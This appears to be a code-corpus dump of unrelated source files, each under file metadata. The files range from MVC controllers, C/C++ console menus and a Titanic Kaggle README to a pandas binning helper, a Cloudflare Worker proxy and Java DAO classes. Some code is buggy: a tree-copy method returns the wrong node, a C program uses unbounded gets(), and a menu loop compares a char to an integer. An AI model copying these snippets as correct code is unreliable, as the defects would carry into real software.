using System.Web;
using System.Web.Mvc;
using WebApplication.Context;
using WebApplication.Helpers;
using WebApplication.Model;
using WebApplication.Models;
namespace WebApplication.Controllers
{
public class HomeController : BaseController
{
public ActionResult Index()
{
List<ProductModel> models = ProductHelper.GetProducts();
return View(models);
}
public ActionResult Delete(int productId)
{
Result result = ProductHelper.DeleteProduct(productId);
//if(result.IsSuccess) {do some great stuff with View and fancy JS } else{ Huston we have a problem !}
return RedirectToAction("Index");
}
public ActionResult ProductForm(int? productId)
{
ProductModel product = new ProductModel();
if(productId.HasValue && productId.Value > 0)
{
product = ProductHelper.GetProductModelById(productId.Value);
}
return PartialView("ProductForm", product);
}
public ActionResult Save(ProductModel model)
{
Result result = new Result();
if (ModelState.IsValid)
{
if (model.ProductID > 0)
{
result = ProductHelper.EditProduct(model);
}
else
{
result = ProductHelper.SaveProduct(model);
}
//For this I should make some frontend setup for user friendly messages fallbacks etc
//if (result.IsSuccess) { DOSomeGreatStuff() }else{ ComeOnYouCanDoIt() }
return RedirectToAction("Index");
}
else
{
//In case of some modelstate errors and stuff when server validation needed
return ProductForm(model.ProductID);
}
}
}
}
|
C++
|
UTF-8
| 3,230 | 3.0625 | 3 |
[] |
no_license
|
#include "PersonalBudget.h"
void PersonalBudget::userRegistration()
{
userManager.userRegistration();
}
void PersonalBudget::viewMainMenu()
{
system("cls");
cout << " MENU G\235\340WNE " << endl;
cout << "*****************************" << endl;
cout << "1. Rejestracja" << endl;
cout << "2. Logowanie" << endl;
cout << "3. Koniec programu" << endl;
cout << "*****************************" << endl;
cout << "Twoj wyb\242r: ";
}
void PersonalBudget::signupUser()
{
userManager.signupUser();
}
void PersonalBudget::mainMenu()
{
char choice='0';
do
{
viewMainMenu();
choice=AuxiliaryMethods::loadSign();
switch (choice)
{
case ('2'):
{
cout << endl << "LOGOWANIE" << endl;
signupUser();
if (userManager.getIdLoggedinUser()!=0)
userMenu();
break;
}
case ('1'):
{
cout << endl << "REJESTRACJA" << endl;
userRegistration();
break;
}
case ('3'):
{
exit(0);
}
default:
cout << endl << "Niepoprawny wyb\242r";
Sleep(1000);
break;
}
}
while (choice!=3);
}
void PersonalBudget::viewUserMenu()
{
system("cls");
cout<< " MENU U\275YTKOWNIKA" << endl;
cout<< "******************************" << endl;
cout << "1. Dodaj przych\242d" << endl;
cout << "2. Dodaj wydatek" << endl;
cout << "3. Bilans z bie\276\245cego miesi\245ca" << endl;
cout << "4. Bilans z poprzedniego miesi\245ca" << endl;
cout << "5. Bilans z wybranego okresu" << endl;
cout << "6. Zmie\344 has\210o" << endl;
cout << "8. Wyloguj si\251" << endl;
cout << "Tw\242j wyb\242r: ";
}
void PersonalBudget::userMenu()
{
char choice='0';
do
{
viewUserMenu();
balanceManager = new BalanceManager(NAME_FILE_WITH_INCOMES, NAME_FILE_WITH_EXPENSES, userManager.getIdLoggedinUser());
choice=AuxiliaryMethods::loadSign();
switch (choice)
{
case ('1'):
{
balanceManager->addIncome();
break;
}
case ('2'):
{
balanceManager->addExpense();
break;
}
case ('3'):
{
balanceManager->balanceCurrentMonth();
break;
}
case ('4'):
{
balanceManager->balancePreviousMonth();
system("pause");
break;
}
case ('5'):
{
balanceManager->balanceSelectedPeriod();
system("pause");
break;
}
case ('6'):
{
userManager.changePassword();
Sleep(1000);
break;
}
case ('8'):
{
logoutUser();
mainMenu();
break;
}
default:
cout << endl << "Niepoprawny wyb\242r";
Sleep(1500);
break;
}
}
while (choice!=8);
}
void PersonalBudget::logoutUser()
{
userManager.logoutUser();
delete balanceManager;
balanceManager = NULL;
}
|
Markdown
|
UTF-8
| 3,697 | 3.15625 | 3 |
[] |
no_license
|
# Titanic_Predictor
Kaggle's "Titanic: Machine Learning from Disaster" Competition
This is my try at competition. Currently I am ranked 1208 of 9553. My best score is 79.904
## My Approach
### EDA
I tried working using all categorical features and all dummy features. This was done in the file **data_cleanup.py**. The steps I took to prepare both sets of features is below:
1. I immediately got rid of the _PassengerID_ as this would be no help.
2. I changed sex from "male", and "female" to 0 and 1. I will do a lot of changes from string to ints because most of the ml models work best with ints
3. I extracted the first letter from the _Cabin_ feature, converted it to an int and set it as the _CabinLetter_. This is done because alone _Cabin_ does not tell us much. Most of the passengers have a unique cabin number, however just the letter from the cabin gives a bit more information
3. I replaced the missing _Age_ values by guessing the persons age as the median age for their _Sex_ and _Pclass_. _Age_ was then converted into five different _AgeRange_. The values for the ranges were chosen by the distribution of ages.
4. I created the feature _Title_ by extracted each passenger's title from their _Name_. _Name_ alone does not give much information since each full name is different. However, _Title_ is useful since it also can indicate what class the person is in.
5. I filled the missing values in _Embarked_ with the most common value "S". I then converted the values to ints.
6. I created the feature _FamilyMems_ by combining _Parch_ and _SibSp_. This gives the total number of family members a passenger has onboard.
7. I filled the missing values in _Fare_ with the most common value "NA". _Fare_ was then converted into five different ranges. The values for the ranges were chosen
by the distribution of fares.
8. I extracted the prefix of the each ticket and used 'XXX' for ones without a prefix.
9. I added three features _Singleton_, _SmallFamily_, and _LargeFamily_ based on _FamilyMems_.
### Models
I tried four different models: Logistical Regression, Random Forest, Adaboost, and XGBoost. Random Forest, Adaboost, and XGBoost all preformed fairly similarly so I decided to focus on Random Forest. My models seem to be overfitting the data (exact values from all runs are in **notes.xlsx**). The scores on the training sets are much higher than the test sets. Because of this I have decreased the number of features used, however this doesn't seem to be helping. I might want to decrease even more.
I've decreased the amount of features to just the top 10 out of ~70. This has been preforming better. Now I'll try with different amount of features.
All of the models are described below.
##### Logistical Regression
Best score: 76.555 with features: "Pclass, "Sex", "AgeRange", "Title"
#### Random Forest
Best score: 79.904 with features: Title_Mr, "Sex", "Title_Mrs", "Pclass_3", "Title_Miss", "Cabin_NA", "Fare_0", "Age_3", "Age_2", "Embarked_C" and default hyperparameters
Previous best score: 77.99 with features: Pclass, "Sex", "AgeRange", "Title", 'CabinLetter', 'Embarked', 'FamilyMems', 'Fare', 'IsAlone' and hyperparameters: {'criterion': 'entropy', 'max_depth': 30, 'max_features': 'sqrt', 'min_samples_leaf': 1, 'min_samples_split': 30, 'n_estimators': 10}
#### Adaboost
Best score: 77.99 with features: Pclass, "Sex", "AgeRange", "Title", 'CabinLetter', 'Embarked', 'FamilyMems', 'Fare' and hyperparameters: {n_estimators=10}
#### XGBoost
Best score: 77.511 with features: With Dummy Vars and hyperparameters: {'booster': 'gbtree', 'gamma': 0, 'learning_rate': 0.3, 'max_depth': 3, 'min_child_weight': 10, 'n_estimators': 30}
|
Java
|
UTF-8
| 751 | 3.28125 | 3 |
[] |
no_license
|
package com.sail.tree;
public class ReverseTree {
public static void reverseTree(TreeNode rootNode){
if (rootNode==null){return;}
TreeNode leftNode = rootNode.getLchild();
TreeNode rightNode = rootNode.getRchild();
rootNode.setRchild(leftNode);
rootNode.setLchild(rightNode);
reverseTree(leftNode);
reverseTree(rightNode);
}
public static TreeNode getReverseTree(TreeNode rootNode){
if (rootNode==null){
return null;
}
TreeNode treeNode = new TreeNode(rootNode.getVal());
treeNode.setRchild(getReverseTree(rootNode.getLchild()));
treeNode.setLchild(getReverseTree(rootNode.getRchild()));
return rootNode;
}
}
|
Python
|
UTF-8
| 2,162 | 3.71875 | 4 |
[] |
no_license
|
import pandas as pd
import numpy as np
############
#Given a list to be binned(input_list) and a list of bin values(bin_list,
#this function will the return where each element in the input_list falls
#belong to. If input_list is extremely long, writing a for loop or using
#pd.Series.apply may not be fast enough. This function make use of the
#pandas vectorized operations to make this binning fast.
#Parameters:
#input_list: a python list to be binned
#bin_list: a python list wit all the bin values
#logical_min: a float for extreme lower bound
#logical_max: a float for extreme upper bound
#Output:
#res_df: a dataframe with 3 columns('input','lowerbound','upperbound')
def binning_func(input_list,bin_list,logical_min=-np.Inf,logical_max=np.Inf):
values = pd.Series(input_list)
val_df = pd.DataFrame({'val':values})
bin_values = pd.Series(list(set(bin_list)))
bin_values.sort_values(inplace=True)
bin_val_df = pd.DataFrame({'bin_val':bin_values})
bin_val_df['upperbound'] = bin_val_df.bin_val.shift(-1).fillna(logical_max)
bin_val_df.set_index('bin_val',inplace=True)
new_cols = []
for bv in bin_values:
val_df[f'{bv}'] = bv < val_df['val']
new_cols.append(f'{bv}')
mask_df = np.exp(pd.DataFrame([bin_list]*len(input_list),columns=new_cols))
masked_df = val_df[new_cols] * mask_df[new_cols]
lowerbounds = np.log(masked_df.max(axis=1)).replace(-np.Inf,logical_min)
res_df = pd.DataFrame({
'input':input_list,
'lowerbound':lowerbounds,
}).join(bin_val_df,on='lowerbound')
res_df['upperbound'] = res_df['upperbound'].fillna(bin_values.min())
return res_df
if __name__ == '__main__':
######sample usage 1:
######output:
###### input lowerbound upperbound
###### -1.2 -50.0 -1.1
###### -0.3 -1.1 0.0
###### 1.3 0.0 1.3
###### 3.0 2.0 3.0
###### 3.1 3.0 inf
input_list = [-1.2,-0.3,1.3,3.0,3.1]
bin_list = [-1.1,0.,1.3,1.5,2.,3.]
logical_min = -50.
logical_max = np.Inf
binning_func(input_list,bin_list,logical_min,logical_max)
|
C++
|
UTF-8
| 2,533 | 3.53125 | 4 |
[] |
no_license
|
/********************************************************
* Programa que le uma cadeia de caracteres e mostra: *
* 1) a quantidade de vogais da cadeia; *
* 2) a quantidade de cada letra diferente *
********************************************************/
#include <stdio.h>
#include <stdlib.h>
#define MAX_CAD 1001
int eh_vogal(char);
int conta_vogais(char[]);
int eh_maiuscula(char);
int eh_minuscula(char);
void conta_letras(char[], int[]);
void mostra_contador_letras(int[]);
int main() {
int array_conta_letras[26] = {0};
char texto[MAX_CAD];
printf("Programa que le uma cadeia de caracteres e mostra: "
"a quantidade de vogais e a quantidade de cada letra diferente:\n\n");
printf("Digite uma cadeia de ate %d caracteres:\n\n", MAX_CAD - 1);
gets(texto);
printf("\nCadeia lida:\n\n");
printf("%s\n\n", texto);
printf("Quantidade de vogais: %d\n\n", conta_vogais(texto));
conta_letras(texto, array_conta_letras);
mostra_contador_letras(array_conta_letras);
printf("\n\n");
system("pause");
return 0;
}
int eh_vogal(char caractere) {
if (caractere == 'A' || caractere == 'a' ||
caractere == 'E' || caractere == 'e' ||
caractere == 'I' || caractere == 'i' ||
caractere == 'O' || caractere == 'o' ||
caractere == 'U' || caractere == 'u')
return 1;
return 0;
}
int conta_vogais(char array[]) {
int indice, contador_vogais = 0;
for (indice = 0; array[indice] != '\0'; indice++)
if (eh_vogal(array[indice]))
contador_vogais++;
return contador_vogais;
}
int eh_maiuscula(char caractere) {
return caractere >= 'A' && caractere <= 'Z' ? 1 : 0;
}
int eh_minuscula(char caractere) {
return caractere >= 'a' && caractere <= 'z' ? 1 : 0;
}
int eh_minuscula(char);
void conta_letras(char cadeia[], int array_conta_letras[]) {
int indice;
for (indice = 0; cadeia[indice] != '\0'; indice++)
if (eh_maiuscula(cadeia[indice]))
array_conta_letras[cadeia[indice] - 'A']++;
else if (eh_minuscula(cadeia[indice]))
array_conta_letras[cadeia[indice] - 'a']++;
return;
}
void mostra_contador_letras(int array_conta_letras[]) {
int letra;
printf("Quantidade de cada letra:\n");
for (letra = 0; letra < 26; letra++) {
if (letra % 6 == 0)
printf("\n");
printf("%c = %3d ", letra + 'A', array_conta_letras[letra]);
}
return;
}
|
C#
|
UTF-8
| 1,596 | 2.859375 | 3 |
[
"MIT"
] |
permissive
|
using System;
using System.IO;
using Contracts = System.Diagnostics.Contracts;
#if CONTRACTS_FULL_SHIM
using Contract = System.Diagnostics.ContractsShim.Contract;
#else
using Contract = System.Diagnostics.Contracts.Contract; // SHIM'D
#endif
namespace KSoft.IO
{
/// <summary>Exposes the concept of a virtual buffer inside a stream</summary>
/// <remarks>No bytes are IO'd. Purely position based</remarks>
[Contracts.ContractClass(typeof(IKSoftStreamWithVirtualBufferContract))]
public interface IKSoftStreamWithVirtualBuffer
{
Stream BaseStream { get; }
/// <summary>Absolute position of the start of the virtual buffer</summary>
long VirtualBufferStart { get; set; }
/// <summary>How many bytes compose the virtual buffer</summary>
long VirtualBufferLength { get; set; }
};
[Contracts.ContractClassFor(typeof(IKSoftStreamWithVirtualBuffer))]
abstract class IKSoftStreamWithVirtualBufferContract : IKSoftStreamWithVirtualBuffer
{
public abstract Stream BaseStream { get; }
public long VirtualBufferStart {
get {
Contract.Ensures(Contract.Result<long>() >= 0);
throw new NotImplementedException();
}
set {
Contract.Requires<ArgumentOutOfRangeException>(value >= 0);
throw new NotImplementedException();
}
}
public long VirtualBufferLength {
get {
Contract.Ensures(Contract.Result<long>() >= 0);
throw new NotImplementedException();
}
set {
Contract.Requires<ArgumentOutOfRangeException>(value >= 0);
throw new NotImplementedException();
}
}
};
}
|
JavaScript
|
UTF-8
| 999 | 3.03125 | 3 |
[] |
no_license
|
/**
* An object with different URLs to fetch
* @param {Object} ORIGINS
*/
const ORIGINS = {
"swapi-proxy.truestack.workers.dev": "swapi.dev",
"api.starwars.run": "swapi.dev",
};
const regex = new RegExp("swapi.dev", "g");
async function handleRequest(request) {
const url = new URL(request.url);
// Check if incoming hostname is a key in the ORIGINS object
if (url.hostname in ORIGINS) {
const target = ORIGINS[url.hostname];
url.hostname = target;
// If it is, proxy request to that third party origin
const originalResponse = await fetch(url.toString(), request);
// Change response body by replacing the original API URL
const originalBody = await originalResponse.text();
return new Response(
originalBody.replace(regex, "api.starwars.run"),
originalResponse
);
}
// Otherwise, process request as normal
return await fetch(request);
}
addEventListener("fetch", (event) => {
event.respondWith(handleRequest(event.request));
});
|
Markdown
|
UTF-8
| 3,467 | 2.78125 | 3 |
[] |
no_license
|
第十章 惊人邪力(3)
姬翠尖叫道:“他已受伤,不要杀他!”
凌渡宇正奇怪姬翠为何仍能保持清醒和行动的能力时,黑影聚闪,庞度·鲁南由地上窜起来。
凌渡宇见到的只是他双眼闪现的黄芒。
“小心!”
凌渡宇大喝一声,把姬翠拉到身旁。
“砰!”
庞度·鲁南的肩头硬撞到囚门处,囚门反弹出来,重重擅在凌渡宇和姬翠身上。
无可抗御的巨力像海潮般涌来,两人立时变作滚地葫芦。
在触地前,凌渡宇再发一枪。
他身手的高明和不受邪力影响的能耐,显然大出正在不断淌血的庞度·鲁南意料之外,他正要从地上拾起另一支自动机枪,一发枪弹及时击中他左肩。
庞度·鲁南像旋风般打了两个转,仰跌地上,接着便往远离凌渡宇这群人的方向滚去。
走廊另一端这时拥来了十多名特种人员,人人骇然大喝“不准动”,但因投鼠忌器,却没有人敢开枪。
三名队员抢前往仍在地上翻滚的庞度·鲁南扑去。
这时凌渡宇刚扶姬翠站起来,见状知道不妙,狂喝道:“退回去!紧守出口!”
但已迟了一步。
庞度·鲁南继续前滚,所过处遗下触目惊心的血渍。
那冲过来的三名队员首先受邪力影响,仆往地面,而庞度·鲁南则从地上跳起来,此时守在另一端的人无不摇摇晃晃,脸上都现出神智不清和痛苦莫名的表情。
姬翠猛地从凌渡宇怀中扑出,疾若劲风般朝庞度·鲁南追去。
凌渡宇苦跟在她背后。
庞度·鲁南回头瞥了两人一眼,狞笑道:“迟些再和你们算账!”
一个闪身,他已奔到了出口外。
两人一先一后奔到出口处,机枪声轰然响起。
凌渡宇猛扑在姬翠娇躯上,两人同时倒地,避过了机枪的射击。
凌渡宇还了三枪。
夺得机枪的庞度·鲁南不知哪处被射中,惨哼一声,踏着被他射杀的队员的尸体奔到了另一出口去。
凌渡宇记得那是通往监狱广场的通道,大骇下奋起余力,跳将起来,狂追而去。
今趟姬翠迟了起步,却仍能保持紧跟在他身后的距离。
凌渡宇此时无暇去思索这个美人儿何来能与他比较的体力和精力,只顾冲往广场去。
机枪声密集响起。
当他踏足广场时,庞度·鲁南已夺得一架属特种部队的装甲车,全速朝紧闭的大门驶去。
“轰!”
整架车爆炸成一团烈焰,往上抛起,而大门亦给碰撞和爆炸摧毁成断块残屑。
二十多名把守广场的特种部队队员,不是倒在血泊内就是禁受不住邪力而倒地,连瞧一眼的能力也欠奉。
在装甲车撞上坚固的外闸前,庞度·鲁南由前座推开车门滚了出来,但爆炸浓烟四散,凌渡宇再看不到接下来的情况。
两人追出大门外时,明月仍高挂天上,但庞度·鲁南已影踪全无。
姬翠狠狠道:“竟让他溜了。”
凌渡宇沉声道:“我们仍有机会,他的能力尚是非常有限,现在消耗得七七八八,只要展开搜捕,说不定可把他擒回来。
否则明天他再吸取月能时,就是他授首的时刻,希望那时你不会再阻我杀他,因为我再不能容许他这么滥杀下去。”
|
JavaScript
|
UTF-8
| 2,653 | 2.625 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
// Copyright 2018 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
var countFrontWhitespace = function(line) {
var m = line.match(/^\s+/);
return m ? m[0].length : 0
};
var loadProperties = function(node, data) {
var start = 0;
var stop;
do {
var index = data.indexOf('=', start);
var property = new VN_Property(data.substring(start, index));
var index2 = data.indexOf(',', index + 1);
var length = parseInt(data.substring(index + 1, index2));
start = index2 + 1 + length;
property.value = data.substring(index2 + 1, index2 + 1 + length);
node.properties.push(property);
node.namedProperties[property.name] = property;
stop = start >= data.length;
if (!stop) {
start += 1;
}
} while (!stop);
node.sortProperties();
node.loadCommonProperties(commonProps);
}
/**
* Parses the view node data and returns the root node
*/
var parseNode = function(data) {
var stack = [];
var root = null;
var lastNode = null;
var lastWhitespaceCount = -INT_MIN_VALUE;
data = data.split("\n");
for (var l = 0; l < data.length - 1; l++) {
var line = data[l];
if (line.toUpperCase() == "DONE.") {
break;
}
var whitespaceCount = countFrontWhitespace(line);
if (lastWhitespaceCount < whitespaceCount) {
stack.push(lastNode);
} else if (stack.length) {
var count = lastWhitespaceCount - whitespaceCount;
for (var i = 0; i < count; i++) {
stack.pop();
}
}
lastWhitespaceCount = whitespaceCount;
line = line.trim();
var index = line.indexOf(' ');
lastNode = new ViewNode(line.substring(0, index));
line = line.substring(index + 1);
loadProperties(lastNode, line);
if (!root) {
root = lastNode;
}
if (stack.length) {
var parent = stack[stack.length - 1];
parent.children.push(lastNode);
}
}
root.updateNodeDrawn();
return root;
}
|
JavaScript
|
UTF-8
| 911 | 3.5625 | 4 |
[] |
no_license
|
let clickers = 50;
let startTime = Date.now();
// position element in the DOM
function sync(dom, pos) {
dom.style.left = `${pos.x}px`;
dom.style.top = `${pos.y}px`;
}
function addClicker() {
const pos = {
x: Math.random() * 500,
y: Math.random() * 300
};
const img = new Image();
img.src = "res/images/rick.png";
img.style.position = "absolute";
img.addEventListener("click", removeClicker, false);
document.querySelector("#board").appendChild(img);
sync(img, pos);
}
function removeClicker(e) {
e.target.parentNode.removeChild(e.target);
clickers--;
checkGameOver();
}
function checkGameOver() {
document.querySelector("#remain").innerHTML = clickers;
if (clickers === 0) {
const taken = Math.round((Date.now() - startTime) / 1000);
alert(`De-rick-ed in ${taken} seconds!`);
}
}
// Add all the Ricks!
for (let i = 0; i < clickers; i++) {
addClicker();
}
|
Java
|
ISO-8859-1
| 2,425 | 2.65625 | 3 |
[] |
no_license
|
package br.edu.ifsc.cds.DAO;
import java.util.ArrayList;
import java.util.List;
import javax.persistence.EntityManager;
import javax.persistence.Query;
import br.edu.ifsc.cds.DAO.Singleton.EntityMagerFactorySingleton;
import br.edu.ifsc.cds.DAO.interfaces.IExercicioDAO;
import br.edu.ifsc.cds.classes.domain.Exercicio;
/**
*
* Classe que implementa a interface {@link IExercicioDAO} para as operaes no
* banco
*
*/
public class ExercicioDAO implements IExercicioDAO {
protected EntityManager em;
@Override
public void create(Exercicio exercicio) {
try {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
em.getTransaction().begin();
em.persist(exercicio);
em.getTransaction().commit();
em.close();
} catch (Exception ex) {
ex.printStackTrace();
em.getTransaction().rollback();
}
}
@Override
public List<Exercicio> retrieveAll() {
List<Exercicio> exercicios = new ArrayList<>();
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Query query = em.createQuery("FROM Exercicio");
exercicios = query.getResultList();
em.close();
return exercicios;
}
@Override
public Exercicio retrieve(Integer id) {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Exercicio exercicio = em.find(Exercicio.class, id);
em.close();
return exercicio;
}
@Override
public void update(Exercicio exercicio) {
try {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
em.getTransaction().begin();
em.merge(exercicio);
em.getTransaction().commit();
em.close();
} catch (Exception ex) {
ex.printStackTrace();
em.getTransaction().rollback();
}
}
@Override
public void delete(Integer id) {
try {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Exercicio exercicio = em.find(Exercicio.class, id);
em.getTransaction().begin();
em.remove(exercicio);
em.getTransaction().commit();
em.close();
} catch (Exception ex) {
ex.printStackTrace();
}
}
@Override
public Exercicio retrieveDadosExer(String nome) {
em = EntityMagerFactorySingleton.getFactory().createEntityManager();
Query consulta = em.createQuery("SELECT e FROM Exercicio e WHERE e.nome = ?1").setParameter(1, nome);
return (Exercicio) consulta.getSingleResult();
}
}
|
C++
|
UTF-8
| 627 | 2.734375 | 3 |
[
"Zlib"
] |
permissive
|
#pragma once
class clan::NetGameConnection;
class clan::NetGameEvent;
class ServerPlayer
{
public:
ServerPlayer(clan::NetGameConnection *connection);
static ServerPlayer *get_player(clan::NetGameConnection *connection);
clan::NetGameConnection *get_connection() const { return connection; }
bool login(int player_id, const std::string &player_name);
bool is_logged_in() const { return id == 0; }
int get_id() const { return id; }
std::string get_name() const { return name; }
void send_event(const clan::NetGameEvent &game_event);
private:
clan::NetGameConnection *connection;
std::string name;
int id;
};
|
C++
|
UTF-8
| 3,149 | 2.765625 | 3 |
[] |
no_license
|
#include "TexturePack.h"
#include <ngl/rapidjson/document.h>
#include <fstream>
#include <iostream>
#include <ngl/Texture.h>
std::unordered_map<std::string,TexturePack::Textures> TexturePack::s_textures;
TexturePack::TexturePack()
{
}
TexturePack::~TexturePack()
{
}
TexturePack::Texture::Texture(GLint _location, const std::string &_name,const std::string &_path)
{
auto setTextureParams=[]()
{
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT);
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT);
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST_MIPMAP_LINEAR);
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST_MIPMAP_LINEAR);
};
location=_location;
name=_name;
ngl::Texture t(_path);
t.setMultiTexture(GL_TEXTURE0+location);
id=t.setTextureGL();
setTextureParams();
}
bool TexturePack::loadJSON(const std::string &_filename)
{
bool success=false;
namespace rj=rapidjson;
std::ifstream file;
file.open(_filename.c_str(), std::ios::in);
if (file.fail())
{
std::cerr<<"error opening json file\n";
return false;
}
std::unique_ptr<std::string> source( new std::string((std::istreambuf_iterator<char>(file)), std::istreambuf_iterator<char>()) );
file.close();
// we need a mutable string for parsing so copy to a char * buffer
std::unique_ptr<char []> buffer(new char[source->size()]);
memcpy(buffer.get(), source->c_str(), source->size());
// null terminate the string!
buffer[source->size()]='\0';
rj::Document doc;
if (doc.ParseInsitu<0>(buffer.get()).HasParseError())
{
std::cerr<<"Parse Error for file "<<_filename<<'\n';
return false;
}
if(!doc.HasMember("TexturePack"))
{
std::cerr<<"This does not seem to be a valid Texture Pack json file\n";
return false;
}
std::cout<<"***************Loading Texture Pack from JSON*****************\n";
// Now we iterate through the json and gather our data.
for (rj::Value::ConstMemberIterator itr = doc.MemberBegin(); itr != doc.MemberEnd(); ++itr)
{
Textures pack;
const rj::Value::Ch* material=itr->value["material"].GetString();
std::cout<<"found material "<< material<<'\n';
const rj::Value& textures = itr->value["Textures"];
for (rj::SizeType i = 0; i < textures.Size(); ++i)
{
const rj::Value ¤tTexture = textures[i];
auto location=currentTexture["location"].GetInt();
const rj::Value::Ch *name=currentTexture["name"].GetString();
const rj::Value::Ch *path=currentTexture["path"].GetString();
std::cout<<"Found "<<name<<' '<<location<<' '<<path<<'\n';
Texture t(location,name,path);
pack.pack.push_back(t);
}
s_textures[material]=pack;
}
return success;
}
bool TexturePack::activateTexturePack(const std::string &_tname)
{
bool success=false;
auto pack=s_textures.find(_tname);
// make sure we have a valid shader
if(pack!=s_textures.end())
{
success=true;
for(auto t : pack->second.pack)
{
glActiveTexture(GL_TEXTURE0+t.location);
glBindTexture(GL_TEXTURE_2D, t.id);
}
}
return success;
}
|
C++
|
UTF-8
| 391 | 2.734375 | 3 |
[] |
no_license
|
#include<iostream.h>
#include<conio.h>
double power(double,int);
void main()
{
clrscr();
double n,r;
int p,b;
cout<<"enter the number=";
cin>>n;
cout<<"\nenter the power=";
cin>>p;
r=power(n,p);
cout<<" \nresult= "<<r;
r=power(n,b=2);
// cout<<"\nresult= "<<r;
getch();
}
double power(double a,int b=2)
{
int x=1,i;
for(i=1;i<=b;i++)
{
x=x*a;
}
return(x);
}
|
Python
|
UTF-8
| 329 | 3.796875 | 4 |
[] |
no_license
|
"""
Input example 1:
level
Output sample 1:
level
Yes
Input example 2:
1 + 2 = 2 + 1 =
Output sample 2:
1 + 2 = 2 + 1 =
No
"""
str = input()
flag = 1
for i in range(0,int(len(str)/2)):
if(str[i] != str[len(str) - 1 - i]):
flag = 0
if(flag == 1):
print(str)
print("Yes")
else:
print(str)
print("No")
|
JavaScript
|
UTF-8
| 1,713 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
'use strict'
/**
* The FileSystem helper used by the FileSystem extension.
*
* @module extensions/snapshot/FileSystem
*/
const path = require('path')
const fs = require('fs-extra')
/**
* Loads file content.
*
* @param {string} file - File path
* @param {string} [encoding='utf8'] - Content encoding
* @return {string} File content
*/
exports.getFileContent = (file, encoding = 'utf8') => {
const data = fs.readFileSync(file)
return data.toString(encoding)
}
/**
*
* @param {string} file - File path
* @param {string} content - Content to write in the file
* @param {object} [options] - Options
* @param {boolean} [options.createDir = true] - Create path dir if it doesn't exists
*/
exports.writeFileContent = (file, content, { createDir = true } = {}) => {
if (createDir) exports.createDirectory(path.dirname(file))
return fs.writeFileSync(file, content)
}
/**
* Gets info about file/directory.
*
* @param {string} file - File path
* @return {fs.Stat|null} File/directory info or null if file/directory does not exist
*/
exports.getFileInfo = (file) => {
let result = null
try {
result = fs.statSync(file)
} catch (err) {
if (err.code !== 'ENOENT') throw err
}
return result
}
/**
* Creates a directory.
*
* @param {string} dir - directory path
* @return {boolean}
*/
exports.createDirectory = (dir) => {
return fs.mkdirsSync(dir)
}
/**
* Removes a file or directory.
*
* @param {string} fileOrDirectory - File or directory path
* @return {boolean}
*/
exports.remove = (fileOrDir) => {
return fs.removeSync(fileOrDir)
}
|
Python
|
UTF-8
| 1,420 | 2.671875 | 3 |
[] |
no_license
|
import utility
import sys
import requests
import json
import csv
from bs4 import BeautifulSoup
def main():
utility.checkInput(["coursesFile", "outputFile", "quarterCode"],[])
utility.checkCred()
filename = sys.argv[1]
outputFilename = sys.argv[2]
quarterCode = sys.argv[3]
courses = utility.processData(filename, '\t')
cookie = utility.getCookie()
utility.checkQuarterCode(quarterCode, cookie)
scrapeWebReg(courses, outputFilename, quarterCode, cookie)
def scrapeWebReg(courses, outputFilename, quarterCode, cookie):
courseData = getCourseData(courses, quarterCode, cookie)
utility.printData(courseData, outputFilename)
def getCourseData(courses, quarterCode, cookie):
courseData = []
for x in range(0, len(courses)):
courseName = courses[x]['SUBJ_CODE'].strip()
courseCode = courses[x]['CRSE_CODE'].rstrip().replace(' ', '+');
utility.updateStatus("Getting course data for " + courseName + " " + courses[x]['CRSE_CODE'].strip())
headers = {
"Cookie": cookie
}
formatted = utility.WEBREG_COURSE_DATA.format(courseName, courseCode, quarterCode);
result = requests.get(formatted, headers=headers)
data = json.loads(result.content)
for obj in data:
courseData.append(obj)
sys.stdout.write('\n')
return courseData
if __name__ == "__main__":
main()
|
C++
|
UTF-8
| 792 | 2.703125 | 3 |
[
"MIT"
] |
permissive
|
#include "beverage.h"
void CaffeineBeverage::boilWater ()
{
printf("Boiling water ...\n");
}
void CaffeineBeverage::pourInCup ()
{
printf("Pouring into cup ...\n");
}
void CaffeineBeverage::prepareRecipe ()
{
boilWater();
brew();
pourInCup();
addCondiments();
}
void CaffeineBeverageWithHook::boilWater ()
{
printf("Boiling water ...\n");
}
void CaffeineBeverageWithHook::pourInCup ()
{
printf("Pouring into cup ...\n");
}
bool CaffeineBeverageWithHook::customerWantsCondiments ()
{
std::string answer = getUserInput();
return (answer == "yes" || answer == "y") ? true : false;
}
void CaffeineBeverageWithHook::prepareRecipe ()
{
boilWater();
brew();
pourInCup();
if (customerWantsCondiments()) addCondiments();
}
|
Java
|
UTF-8
| 6,748 | 1.679688 | 2 |
[] |
no_license
|
package xgame.tools.config;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import freemarker.template.Configuration;
import freemarker.template.ObjectWrapper;
import freemarker.template.TemplateExceptionHandler;
public class ToolsConf {
/**js文件写入开关*/
public static boolean file_write_switch_js=true;
/**消息写入开关*/
public static boolean file_write_switch_message=false;
/**java文件写入开关*/
public static boolean file_write_switch_sever=false;
public static String path_excel = "../../exls";
public static String path_json_client = "../../client/client_src/jsonFiles/";
public static String path_java_server = "../../server/mind-suport/src/main/java/com/globalgame/auto/json/";
public static String path_json_server = "../../server/mind-suport/src/main/json/";
public static String JAVA_SERVER_MESSAGE = "../../server/mind-server/src/main/java/com/mind/auto/msg/";
